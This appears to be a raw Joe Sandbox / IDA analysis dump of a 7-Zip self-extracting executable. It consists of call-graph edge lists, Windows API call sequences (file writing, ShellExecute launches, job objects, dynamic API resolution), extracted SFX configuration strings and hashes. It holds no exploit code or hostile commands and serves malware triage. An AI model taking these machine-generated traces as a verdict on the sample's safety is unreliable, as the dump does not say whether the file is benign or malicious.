GetTempPathW 10039->10040 10040->10043 10041 4027aa 2 API calls 10042 4045b2 wsprintfW 10041->10042 10042->10043 10043->10041 10044 4045c9 GetFileAttributesW 10043->10044 10045 4045ed 10043->10045 10044->10043 10044->10045 10045->9722 10047 401745 10046->10047 10062 40d041 3 API calls 10047->10062 10048 401769 10049 401794 10048->10049 10546 40110a 10048->10546 10051 408dbf 57 API calls 10049->10051 10055 40179c 10051->10055 10053 4017bc 10054 4017d4 ??2@YAPAXI 10053->10054 10056 4036f1 88 API calls 10053->10056 10057 4017e0 10054->10057 10058 4017e7 10054->10058 10055->9739 10059 4017cf 10056->10059 10569 401470 10057->10569 10550 401611 10058->10550 10059->10054 10059->10055 10062->10048 10064 402426 10063->10064 10065 40242b 10063->10065 10064->9840 10066 40236f 3 API calls 10065->10066 10067 402430 10066->10067 10068 402441 10067->10068 10069 40243a 10067->10069 10068->9840 10987 4023e9 LoadLibraryA GetProcAddress 10069->10987 10073 4044c6 2 API calls 10072->10073 10074 4048b7 10073->10074 10075 401429 2 API calls 10074->10075 10076 4048c2 10075->10076 10077 4048c7 10076->10077 10078 40133e 2 API calls 10077->10078 10079 4048d5 10078->10079 10080 4027c2 2 API calls 10079->10080 10081 4048e0 10080->10081 10081->9858 10083 401458 2 API calls 10082->10083 10084 404f78 10083->10084 10085 401458 2 API calls 10084->10085 10086 404f80 memset 10085->10086 10087 404fae 10086->10087 10088 404a97 2 API calls 10087->10088 10089 404fd1 10088->10089 10090 401370 2 API calls 10089->10090 10091 404fdc 10090->10091 10092 404fe1 ??3@YAXPAX 10091->10092 10093 404ffa ShellExecuteExW 10091->10093 10094 404fec ??3@YAXPAX 10092->10094 10095 405014 10093->10095 10096 40503a 10093->10096 10094->9864 10097 405028 CloseHandle 10095->10097 10098 40501d WaitForSingleObject 10095->10098 10099 405031 ??3@YAXPAX 10096->10099 10097->10099 10098->10097 10099->10094 10101 407c87 4 API calls 10100->10101 10102 404eb5 10101->10102 10103 402187 19 API calls 10102->10103 10104 404ec3 10103->10104 
10105 402771 2 API calls 10104->10105 10106 404ecd 10105->10106 10107 404f03 wsprintfW 10106->10107 10109 4027c2 ??2@YAPAXI ??3@YAXPAX 10106->10109 10108 4027c2 2 API calls 10107->10108 10110 404f31 10108->10110 10109->10106 10111 4027c2 2 API calls 10110->10111 10112 404f3e 10111->10112 10113 407ce8 22 API calls 10112->10113 10114 404f53 ??3@YAXPAX 10113->10114 10989 407a5b ??3@YAXPAX 10114->10989 10116 404f64 10116->9563 10118 40cdda ctype 3 API calls 10117->10118 10119 404521 10118->10119 10120 40ccfd ctype 3 API calls 10119->10120 10121 40ce45 ??3@YAXPAX 10120->10121 10121->9551 10123 4052b4 10122->10123 10129 4052d0 10122->10129 10126 4052c6 _wtol 10123->10126 10123->10129 10124 404f67 9 API calls 10125 4052f3 10124->10125 10127 405301 10125->10127 10128 4052fb GetLastError 10125->10128 10126->10129 10127->9563 10128->10127 10129->10124 10131 40ca5c 2 API calls 10130->10131 10132 4054ed 10131->10132 10133 405549 10132->10133 10135 402771 2 API calls 10132->10135 10134 402823 2 API calls 10133->10134 10136 405551 10134->10136 10141 4054fc 10135->10141 10137 4028b9 2 API calls 10136->10137 10138 40555e 10137->10138 10139 402953 2 API calls 10138->10139 10143 40556b 10139->10143 10140 4055ba ??3@YAXPAX 10146 4055b6 10140->10146 10141->10140 10142 4036f1 88 API calls 10141->10142 10144 405520 10142->10144 10145 402953 2 API calls 10143->10145 10144->10140 10148 40ca5c 2 API calls 10144->10148 10147 405578 10145->10147 10146->9620 10149 402953 2 API calls 10147->10149 10151 40553c 10148->10151 10150 405585 10149->10150 10152 40d0a5 2 API calls 10150->10152 10151->10140 10153 405540 ??3@YAXPAX 10151->10153 10154 405599 10152->10154 10153->10133 10154->10140 10155 4055a2 ??3@YAXPAX 10154->10155 10155->10146 10157 402823 2 API calls 10156->10157 10173 403415 10157->10173 10158 4036b4 ??3@YAXPAX 10159 4036eb 10158->10159 10159->9608 10159->9613 10160 401458 ??2@YAPAXI ??3@YAXPAX 10160->10173 10161 402823 2 API calls 10161->10173 10162 402ad8 ??2@YAPAXI ??3@YAXPAX 
Execution graph (rendered in the original as an edge list of numbered basic blocks; only the API-call nodes it names are kept here, grouped by call path):
• 0x40505b GetCommandLineW → 0x4051d7 CreateJobObjectW → 0x4051ef AssignProcessToJobObject → 0x4051fd CreateIoCompletionPort → 0x40520f SetInformationJobObject, ResumeThread → 0x40523d GetQueuedCompletionStatus → 0x405252 ResumeThread, WaitForSingleObject → 0x405262 CloseHandle, GetExitCodeProcess → 0x40527f GetLastError, 0x405288/0x405291/0x40529a CloseHandle (the child process is placed in a job object and awaited through an I/O completion port)
• 0x40532e GetDriveTypeW → 0x405368 CreateFileW → 0x405422 WriteFile, CloseHandle → 0x405458 SetFileAttributesW, ShellExecuteW (a file is written to disk, its attributes set, then it is launched)
• 0x4023be LoadLibraryA, GetProcAddress (dynamic API resolution)
• 0x40163a CreateThread → 0x40166e WaitForSingleObject → 0x4016c5 GetExitCodeThread → 0x40170b SetLastError
• 0x401bdf GetStdHandle, WriteFile, called repeatedly from 0x408ec8 to 0x408f7d and from 0x402d3f
• 0x402491 CheckTokenMembership, FreeSid; 0x402390 GetNativeSystemInfo; 0x4012ee Sleep; 0x40132a EndDialog; 0x40c9e5 ReadFile
• string and memory helpers: MultiByteToWideChar (0x402b01), WideCharToMultiByte (0x4028b3), lstrcmpW, lstrlenW, lstrlenA, wcsncmp, strncmp, memcmp, memmove, memcpy, CharUpperW, wsprintfA, _wtol, ctype helpers at 0x40cdda, and MSVCRT operator new/delete (??2@YAPAXI@Z, ??3@YAXPAX@Z)
                                                                      APIs
                                                                      • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
                                                                        • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                        • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                        • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                        • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                        • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
                                                                        • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                        • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                      • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
                                                                      • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
                                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                        • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
                                                                        • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
                                                                      • _wtol.MSVCRT ref: 00405825
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
                                                                      • _wtol.MSVCRT ref: 00405A25
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
                                                                      • wsprintfW.USER32 ref: 00405D2A
                                                                        • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                      • GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
                                                                        • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                        • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                        • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
                                                                      • _wtol.MSVCRT ref: 00405F6B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
                                                                      • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
                                                                      • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                                      • CoInitialize.OLE32(00000000), ref: 004062F2
                                                                      • _wtol.MSVCRT ref: 00406338
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                                      • GetKeyState.USER32(00000010), ref: 004063BE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
                                                                      • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                                      • _wtol.MSVCRT ref: 0040686C
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                                        • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                                        • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                        • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                                        • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                        • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                                        • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                                        • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                                        • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                                      • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                                      • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$@v_$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$H|_$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86$xu_$_
                                                                      • API String ID: 1141480454-4210251009
                                                                      • Opcode ID: 70599bd1909c1660afbe8675f911dde0ba5a546dff0894423a23835351c4fce5
                                                                      • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                                      • Opcode Fuzzy Hash: 70599bd1909c1660afbe8675f911dde0ba5a546dff0894423a23835351c4fce5
                                                                      • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

                                                                      Control-flow Graph: function at 00401815
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c73201a278f1b3fb0192b37316eaaccfca94a9c717224a51945d29c04819a4bf
                                                                      • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
                                                                      • Opcode Fuzzy Hash: c73201a278f1b3fb0192b37316eaaccfca94a9c717224a51945d29c04819a4bf
                                                                      • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

                                                                      Control-flow Graph: function at 0040236F
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                      • String ID: GetNativeSystemInfo$kernel32
                                                                      • API String ID: 2103483237-3846845290
                                                                      • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                      • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                                      • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                      • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

                                                                      Control-flow Graph: function at 00403387
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                                      • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1799206407-0
                                                                      • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                      • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                                      • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                      • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
                                                                      APIs
                                                                      • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                                      • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: DiskFreeMessageSendSpace
                                                                      • String ID:
                                                                      • API String ID: 696007252-0
                                                                      • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                      • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                                      • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                      • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

                                                                      Control-flow Graph: function at 00404F67
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00404F8B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                      • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                                      • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                                      • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                      • String ID: $gA
                                                                      • API String ID: 2700081640-3949116232
                                                                      • Opcode ID: af380bbf304387a9167cbd1d4d1862e6770bcacde50da9e8c22bf20be027a6a5
                                                                      • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                                      • Opcode Fuzzy Hash: af380bbf304387a9167cbd1d4d1862e6770bcacde50da9e8c22bf20be027a6a5
                                                                      • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                      • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                      • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                      • DispatchMessageW.USER32(?), ref: 00401D73
                                                                      • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                      • String ID: Static
                                                                      • API String ID: 2479445380-2272013587
                                                                      • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                      • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
